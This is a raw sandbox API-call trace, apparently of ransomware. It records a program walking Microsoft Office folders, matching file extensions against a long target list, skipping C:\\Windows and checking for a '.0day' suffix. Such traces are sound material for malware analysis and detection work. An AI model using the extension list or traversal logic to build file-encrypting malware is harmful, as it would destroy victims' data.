(lpString=".cfml") returned 5 [0265.452] lstrcmpiW (lpString1=".cfml", lpString2=".0day") returned 1 [0265.452] lstrlenW (lpString=".cfu") returned 4 [0265.452] lstrcmpiW (lpString1=".cfu", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".chm") returned 4 [0265.453] lstrcmpiW (lpString1=".chm", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".cin") returned 4 [0265.453] lstrcmpiW (lpString1=".cin", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".class") returned 6 [0265.453] lstrcmpiW (lpString1=".class", lpString2="].0day") returned -1 [0265.453] lstrlenW (lpString=".clx") returned 4 [0265.453] lstrcmpiW (lpString1=".clx", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".config") returned 7 [0265.453] lstrcmpiW (lpString1=".config", lpString2="m].0day") returned -1 [0265.453] lstrlenW (lpString=".cpp") returned 4 [0265.453] lstrcmpiW (lpString1=".cpp", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".cr2") returned 4 [0265.453] lstrcmpiW (lpString1=".cr2", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".crt") returned 4 [0265.453] lstrcmpiW (lpString1=".crt", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".crw") returned 4 [0265.453] lstrcmpiW (lpString1=".crw", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".cs") returned 3 [0265.453] lstrcmpiW (lpString1=".cs", lpString2="day") returned -1 [0265.453] lstrlenW (lpString=".css") returned 4 [0265.453] lstrcmpiW (lpString1=".css", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".csv") returned 4 [0265.453] lstrcmpiW (lpString1=".csv", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".cub") returned 4 [0265.453] lstrcmpiW (lpString1=".cub", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".dae") returned 4 [0265.453] lstrcmpiW (lpString1=".dae", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".dat") returned 4 [0265.453] lstrcmpiW (lpString1=".dat", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".db") returned 3 [0265.453] lstrcmpiW (lpString1=".db", lpString2="day") returned -1 [0265.453] lstrlenW (lpString=".dbf") returned 4 [0265.453] lstrcmpiW (lpString1=".dbf", lpString2="0day") returned -1 [0265.453] lstrlenW (lpString=".dbx") returned 4 [0265.454] lstrcmpiW (lpString1=".dbx", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".dc3") returned 4 [0265.454] lstrcmpiW (lpString1=".dc3", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".dcm") returned 4 [0265.454] lstrcmpiW (lpString1=".dcm", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".dcr") returned 4 [0265.454] lstrcmpiW (lpString1=".dcr", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".der") returned 4 [0265.454] lstrcmpiW (lpString1=".der", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".dib") returned 4 [0265.454] lstrcmpiW (lpString1=".dib", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".dic") returned 4 [0265.454] lstrcmpiW (lpString1=".dic", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".dif") returned 4 [0265.454] lstrcmpiW (lpString1=".dif", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".divx") returned 5 [0265.454] lstrcmpiW (lpString1=".divx", lpString2=".0day") returned 1 [0265.454] lstrlenW (lpString=".djvu") returned 5 [0265.454] lstrcmpiW (lpString1=".djvu", lpString2=".0day") returned 1 [0265.454] lstrlenW (lpString=".dng") returned 4 [0265.454] lstrcmpiW (lpString1=".dng", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".doc") returned 4 [0265.454] lstrcmpiW (lpString1=".doc", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".docm") returned 5 [0265.454] lstrcmpiW (lpString1=".docm", lpString2=".0day") returned 1 [0265.454] lstrlenW (lpString=".docx") returned 5 [0265.454] lstrcmpiW (lpString1=".docx", lpString2=".0day") returned 1 [0265.454] lstrlenW (lpString=".dot") returned 4 [0265.454] lstrcmpiW (lpString1=".dot", lpString2="0day") returned -1 [0265.454] lstrlenW (lpString=".dotm") returned 5 [0265.454] lstrcmpiW (lpString1=".dotm", lpString2=".0day") returned 1 [0265.454] lstrlenW (lpString=".dotx") returned 5 [0265.454] lstrcmpiW (lpString1=".dotx", lpString2=".0day") returned 1 [0265.454] lstrlenW (lpString=".dpx") returned 4 [0265.454] lstrcmpiW (lpString1=".dpx", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".dqy") returned 4 [0265.455] lstrcmpiW (lpString1=".dqy", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".dsn") returned 4 [0265.455] lstrcmpiW (lpString1=".dsn", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".dt") returned 3 [0265.455] lstrcmpiW (lpString1=".dt", lpString2="day") returned -1 [0265.455] lstrlenW (lpString=".dtd") returned 4 [0265.455] lstrcmpiW (lpString1=".dtd", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".dwg") returned 4 [0265.455] lstrcmpiW (lpString1=".dwg", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".dwt") returned 4 [0265.455] lstrcmpiW (lpString1=".dwt", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".dx") returned 3 [0265.455] lstrcmpiW (lpString1=".dx", lpString2="day") returned -1 [0265.455] lstrlenW (lpString=".dxf") returned 4 [0265.455] lstrcmpiW (lpString1=".dxf", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".edml") returned 5 [0265.455] lstrcmpiW (lpString1=".edml", lpString2=".0day") returned 1 [0265.455] lstrlenW (lpString=".efd") returned 4 [0265.455] lstrcmpiW (lpString1=".efd", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".elf") returned 4 [0265.455] lstrcmpiW (lpString1=".elf", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".emf") returned 4 [0265.455] lstrcmpiW (lpString1=".emf", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".emz") returned 4 [0265.455] lstrcmpiW (lpString1=".emz", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".epf") returned 4 [0265.455] lstrcmpiW (lpString1=".epf", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".eps") returned 4 [0265.455] lstrcmpiW (lpString1=".eps", lpString2="0day") returned -1 [0265.455] lstrlenW (lpString=".epsf") returned 5 [0265.455] lstrcmpiW (lpString1=".epsf", lpString2=".0day") returned 1 [0265.455] lstrlenW (lpString=".epsp") returned 5 [0265.455] lstrcmpiW (lpString1=".epsp", lpString2=".0day") returned 1 [0265.455] lstrlenW (lpString=".erf") returned 4 [0265.456] lstrcmpiW (lpString1=".erf", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".exr") returned 4 [0265.456] lstrcmpiW (lpString1=".exr", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".f4v") returned 4 [0265.456] lstrcmpiW (lpString1=".f4v", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".fido") returned 5 [0265.456] lstrcmpiW (lpString1=".fido", lpString2=".0day") returned 1 [0265.456] lstrlenW (lpString=".flm") returned 4 [0265.456] lstrcmpiW (lpString1=".flm", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".flv") returned 4 [0265.456] lstrcmpiW (lpString1=".flv", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".frm") returned 4 [0265.456] lstrcmpiW (lpString1=".frm", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".fxg") returned 4 [0265.456] lstrcmpiW (lpString1=".fxg", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".geo") returned 4 [0265.456] lstrcmpiW (lpString1=".geo", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".gif") returned 4 [0265.456] lstrcmpiW (lpString1=".gif", lpString2="0day") returned -1 [0265.456] lstrlenW (lpString=".grs") returned 4 [0265.456] lstrcmpiW (lpString1=".grs", lpString2="0day") returned -1 [0269.478] FindClose (in: hFindFile=0x3581100 | out: hFindFile=0x3581100) returned 1 [0269.478] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x42dd078 | out: hHeap=0x4a0000) returned 1 [0269.478] FindNextFileW (in: hFindFile=0x3581040, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2162900, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x51b925d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2162900, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10.DLL", cAlternateFileName="")) returned 1 [0269.494] FindClose (in: hFindFile=0x3581040 | out: hFindFile=0x3581040) returned 1 [0269.494] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x42c9068 | out: hHeap=0x4a0000) returned 1 [0269.494] FindNextFileW (in: hFindFile=0x3580ec0, lpFindFileData=0x3cdf58c | out: lpFindFileData=0x3cdf58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0269.494] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*", lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3580980 [0269.609] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0269.609] FindNextFileW (in: hFindFile=0x3580980, lpFindFileData=0x3cdf310 | out: lpFindFileData=0x3cdf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0269.609] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033") returned 1 [0269.609] lstrcmpiW (lpString1="C:\\Windows", lpString2="1033") returned 1 [0269.609] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x42b9060 [0269.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033") returned 53 [0269.609] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*", lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3580f00 [0269.612] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0269.612] FindNextFileW (in: hFindFile=0x3580f00, lpFindFileData=0x3cdf094 | out: lpFindFileData=0x3cdf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x130a0400, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x130a0400, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c438, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MML", cAlternateFileName="")) returned 1 [0269.612] lstrlenW (lpString="OFFICE10.MML") returned 12 [0269.612] lstrlenW (lpString=".1cd") returned 4 [0269.612] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0269.612] lstrlenW (lpString=".3ds") returned 4 [0269.612] lstrcmpiW (lpString1=".3ds", lpString2=".MML") returned -1 [0269.612] lstrlenW (lpString=".3fr") returned 4 [0269.612] lstrcmpiW (lpString1=".3fr", lpString2=".MML") returned -1 [0269.612] lstrlenW (lpString=".3g2") returned 4 [0269.612] lstrcmpiW (lpString1=".3g2", lpString2=".MML") returned -1 [0269.612] lstrlenW (lpString=".3gp") returned 4 [0269.612] lstrcmpiW (lpString1=".3gp", lpString2=".MML") returned -1 [0269.612] lstrlenW (lpString=".7z") returned 3 [0269.612] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0269.612] lstrlenW (lpString=".accda") returned 6 [0269.612] lstrcmpiW (lpString1=".accda", lpString2="10.MML") returned -1 [0269.612] lstrlenW (lpString=".accdb") returned 6 [0269.612] lstrcmpiW (lpString1=".accdb", lpString2="10.MML") returned -1 [0269.612] lstrlenW (lpString=".accdc") returned 6 [0269.612] lstrcmpiW (lpString1=".accdc", lpString2="10.MML") returned -1 [0269.612] lstrlenW (lpString=".accde") returned 6 [0269.613] lstrcmpiW (lpString1=".accde", lpString2="10.MML") returned -1 [0269.613] lstrlenW (lpString=".accdt") returned 6 [0269.613] lstrcmpiW (lpString1=".accdt", lpString2="10.MML") returned -1 [0269.613] lstrlenW (lpString=".accdw") returned 6 [0269.613] lstrcmpiW (lpString1=".accdw", lpString2="10.MML") returned -1 [0269.613] lstrlenW (lpString=".adb") returned 4 [0269.613] lstrcmpiW (lpString1=".adb", lpString2=".MML") returned -1 [0269.613] lstrlenW (lpString=".adp") returned 4 [0269.613] lstrcmpiW (lpString1=".adp", lpString2=".MML") returned -1 [0269.613] lstrlenW (lpString=".ai") returned 3 [0269.613] lstrcmpiW (lpString1=".ai", lpString2="MML") returned -1 [0269.613] lstrlenW (lpString=".ai3") returned 4 [0269.613] lstrcmpiW (lpString1=".ai3", lpString2=".MML") returned -1 [0269.613] lstrlenW (lpString=".ai4") returned 4 [0269.613] lstrcmpiW (lpString1=".ai4", lpString2=".MML") returned -1 [0269.613] lstrlenW (lpString=".ai5") returned 4 [0269.614] lstrcmpiW (lpString1=".ai5", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".ai6") returned 4 [0269.614] lstrcmpiW (lpString1=".ai6", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".ai7") returned 4 [0269.614] lstrcmpiW (lpString1=".ai7", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".ai8") returned 4 [0269.614] lstrcmpiW (lpString1=".ai8", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".anim") returned 5 [0269.614] lstrcmpiW (lpString1=".anim", lpString2="0.MML") returned -1 [0269.614] lstrlenW (lpString=".arw") returned 4 [0269.614] lstrcmpiW (lpString1=".arw", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".as") returned 3 [0269.614] lstrcmpiW (lpString1=".as", lpString2="MML") returned -1 [0269.614] lstrlenW (lpString=".asa") returned 4 [0269.614] lstrcmpiW (lpString1=".asa", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".asc") returned 4 [0269.614] lstrcmpiW (lpString1=".asc", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".ascx") returned 5 [0269.614] lstrcmpiW (lpString1=".ascx", lpString2="0.MML") returned -1 [0269.614] lstrlenW (lpString=".asm") returned 4 [0269.614] lstrcmpiW (lpString1=".asm", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".asmx") returned 5 [0269.614] lstrcmpiW (lpString1=".asmx", lpString2="0.MML") returned -1 [0269.614] lstrlenW (lpString=".asp") returned 4 [0269.614] lstrcmpiW (lpString1=".asp", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".aspx") returned 5 [0269.614] lstrcmpiW (lpString1=".aspx", lpString2="0.MML") returned -1 [0269.614] lstrlenW (lpString=".asr") returned 4 [0269.614] lstrcmpiW (lpString1=".asr", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".asx") returned 4 [0269.614] lstrcmpiW (lpString1=".asx", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".avi") returned 4 [0269.614] lstrcmpiW (lpString1=".avi", lpString2=".MML") returned -1 [0269.614] lstrlenW (lpString=".avs") returned 4 [0269.615] lstrcmpiW (lpString1=".avs", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".backup") returned 7 [0269.615] lstrcmpiW (lpString1=".backup", lpString2="E10.MML") returned -1 [0269.615] lstrlenW (lpString=".bak") returned 4 [0269.615] lstrcmpiW (lpString1=".bak", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".bay") returned 4 [0269.615] lstrcmpiW (lpString1=".bay", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".bd") returned 3 [0269.615] lstrcmpiW (lpString1=".bd", lpString2="MML") returned -1 [0269.615] lstrlenW (lpString=".bin") returned 4 [0269.615] lstrcmpiW (lpString1=".bin", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".bmp") returned 4 [0269.615] lstrcmpiW (lpString1=".bmp", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".bz2") returned 4 [0269.615] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".c") returned 2 [0269.615] lstrcmpiW (lpString1=".c", lpString2="ML") returned -1 [0269.615] lstrlenW (lpString=".cdr") returned 4 [0269.615] lstrcmpiW (lpString1=".cdr", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".cer") returned 4 [0269.615] lstrcmpiW (lpString1=".cer", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".cf") returned 3 [0269.615] lstrcmpiW (lpString1=".cf", lpString2="MML") returned -1 [0269.615] lstrlenW (lpString=".cfc") returned 4 [0269.615] lstrcmpiW (lpString1=".cfc", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".cfm") returned 4 [0269.615] lstrcmpiW (lpString1=".cfm", lpString2=".MML") returned -1 [0269.615] lstrlenW (lpString=".cfml") returned 5 [0269.616] lstrcmpiW (lpString1=".cfml", lpString2="0.MML") returned -1 [0269.616] lstrlenW (lpString=".cfu") returned 4 [0269.616] lstrcmpiW (lpString1=".cfu", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".chm") returned 4 [0269.616] lstrcmpiW (lpString1=".chm", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".cin") returned 4 [0269.616] lstrcmpiW (lpString1=".cin", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".class") returned 6 [0269.616] lstrcmpiW (lpString1=".class", lpString2="10.MML") returned -1 [0269.616] lstrlenW (lpString=".clx") returned 4 [0269.616] lstrcmpiW (lpString1=".clx", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".config") returned 7 [0269.616] lstrcmpiW (lpString1=".config", lpString2="E10.MML") returned -1 [0269.616] lstrlenW (lpString=".cpp") returned 4 [0269.616] lstrcmpiW (lpString1=".cpp", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".cr2") returned 4 [0269.616] lstrcmpiW (lpString1=".cr2", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".crt") returned 4 [0269.616] lstrcmpiW (lpString1=".crt", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".crw") returned 4 [0269.616] lstrcmpiW (lpString1=".crw", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".cs") returned 3 [0269.616] lstrcmpiW (lpString1=".cs", lpString2="MML") returned -1 [0269.616] lstrlenW (lpString=".css") returned 4 [0269.616] lstrcmpiW (lpString1=".css", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".csv") returned 4 [0269.616] lstrcmpiW (lpString1=".csv", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".cub") returned 4 [0269.616] lstrcmpiW (lpString1=".cub", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".dae") returned 4 [0269.616] lstrcmpiW (lpString1=".dae", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".dat") returned 4 [0269.616] lstrcmpiW (lpString1=".dat", lpString2=".MML") returned -1 [0269.616] lstrlenW (lpString=".db") returned 3 [0269.617] lstrcmpiW (lpString1=".db", lpString2="MML") returned -1 [0269.617] lstrlenW (lpString=".dbf") returned 4 [0269.617] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".dbx") returned 4 [0269.617] lstrcmpiW (lpString1=".dbx", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".dc3") returned 4 [0269.617] lstrcmpiW (lpString1=".dc3", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".dcm") returned 4 [0269.617] lstrcmpiW (lpString1=".dcm", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".dcr") returned 4 [0269.617] lstrcmpiW (lpString1=".dcr", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".der") returned 4 [0269.617] lstrcmpiW (lpString1=".der", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".dib") returned 4 [0269.617] lstrcmpiW (lpString1=".dib", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".dic") returned 4 [0269.617] lstrcmpiW (lpString1=".dic", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".dif") returned 4 [0269.617] lstrcmpiW (lpString1=".dif", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".divx") returned 5 [0269.617] lstrcmpiW (lpString1=".divx", lpString2="0.MML") returned -1 [0269.617] lstrlenW (lpString=".djvu") returned 5 [0269.617] lstrcmpiW (lpString1=".djvu", lpString2="0.MML") returned -1 [0269.617] lstrlenW (lpString=".dng") returned 4 [0269.617] lstrcmpiW (lpString1=".dng", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".doc") returned 4 [0269.617] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".docm") returned 5 [0269.617] lstrcmpiW (lpString1=".docm", lpString2="0.MML") returned -1 [0269.617] lstrlenW (lpString=".docx") returned 5 [0269.617] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0269.617] lstrlenW (lpString=".dot") returned 4 [0269.617] lstrcmpiW (lpString1=".dot", lpString2=".MML") returned -1 [0269.617] lstrlenW (lpString=".dotm") returned 5 [0269.617] lstrcmpiW (lpString1=".dotm", lpString2="0.MML") returned -1 [0269.618] lstrlenW (lpString=".dotx") returned 5 [0269.618] lstrcmpiW (lpString1=".dotx", lpString2="0.MML") returned -1 [0269.618] lstrlenW (lpString=".dpx") returned 4 [0269.618] lstrcmpiW (lpString1=".dpx", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".dqy") returned 4 [0269.618] lstrcmpiW (lpString1=".dqy", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".dsn") returned 4 [0269.618] lstrcmpiW (lpString1=".dsn", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".dt") returned 3 [0269.618] lstrcmpiW (lpString1=".dt", lpString2="MML") returned -1 [0269.618] lstrlenW (lpString=".dtd") returned 4 [0269.618] lstrcmpiW (lpString1=".dtd", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".dwg") returned 4 [0269.618] lstrcmpiW (lpString1=".dwg", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".dwt") returned 4 [0269.618] lstrcmpiW (lpString1=".dwt", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".dx") returned 3 [0269.618] lstrcmpiW (lpString1=".dx", lpString2="MML") returned -1 [0269.618] lstrlenW (lpString=".dxf") returned 4 [0269.618] lstrcmpiW (lpString1=".dxf", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".edml") returned 5 [0269.618] lstrcmpiW (lpString1=".edml", lpString2="0.MML") returned -1 [0269.618] lstrlenW (lpString=".efd") returned 4 [0269.618] lstrcmpiW (lpString1=".efd", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".elf") returned 4 [0269.618] lstrcmpiW (lpString1=".elf", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".emf") returned 4 [0269.618] lstrcmpiW (lpString1=".emf", lpString2=".MML") returned -1 [0269.618] lstrlenW (lpString=".emz") returned 4 [0269.618] lstrcmpiW (lpString1=".emz", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".epf") returned 4 [0269.619] lstrcmpiW (lpString1=".epf", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".eps") returned 4 [0269.619] lstrcmpiW (lpString1=".eps", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".epsf") returned 5 [0269.619] lstrcmpiW (lpString1=".epsf", lpString2="0.MML") returned -1 [0269.619] lstrlenW (lpString=".epsp") returned 5 [0269.619] lstrcmpiW (lpString1=".epsp", lpString2="0.MML") returned -1 [0269.619] lstrlenW (lpString=".erf") returned 4 [0269.619] lstrcmpiW (lpString1=".erf", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".exr") returned 4 [0269.619] lstrcmpiW (lpString1=".exr", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".f4v") returned 4 [0269.619] lstrcmpiW (lpString1=".f4v", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".fido") returned 5 [0269.619] lstrcmpiW (lpString1=".fido", lpString2="0.MML") returned -1 [0269.619] lstrlenW (lpString=".flm") returned 4 [0269.619] lstrcmpiW (lpString1=".flm", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".flv") returned 4 [0269.619] lstrcmpiW (lpString1=".flv", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".frm") returned 4 [0269.619] lstrcmpiW (lpString1=".frm", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".fxg") returned 4 [0269.619] lstrcmpiW (lpString1=".fxg", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".geo") returned 4 [0269.619] lstrcmpiW (lpString1=".geo", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".gif") returned 4 [0269.619] lstrcmpiW (lpString1=".gif", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".grs") returned 4 [0269.619] lstrcmpiW (lpString1=".grs", lpString2=".MML") returned -1 [0269.619] lstrlenW (lpString=".gz") returned 3 [0269.619] lstrcmpiW (lpString1=".gz", lpString2="MML") returned -1 [0269.620] lstrlenW (lpString=".h") returned 2 [0269.620] lstrcmpiW (lpString1=".h", lpString2="ML") returned -1 [0269.620] lstrlenW (lpString=".hdr") returned 4 [0269.620] lstrcmpiW (lpString1=".hdr", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".hpp") returned 4 [0269.620] lstrcmpiW (lpString1=".hpp", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".hta") returned 4 [0269.620] lstrcmpiW (lpString1=".hta", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".htc") returned 4 [0269.620] lstrcmpiW (lpString1=".htc", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".htm") returned 4 [0269.620] lstrcmpiW (lpString1=".htm", lpString2=".MML") returned -1 [0269.620] lstrlenW (lpString=".html") returned 5 [0269.620] lstrcmpiW (lpString1=".html", lpString2="0.MML") returned -1 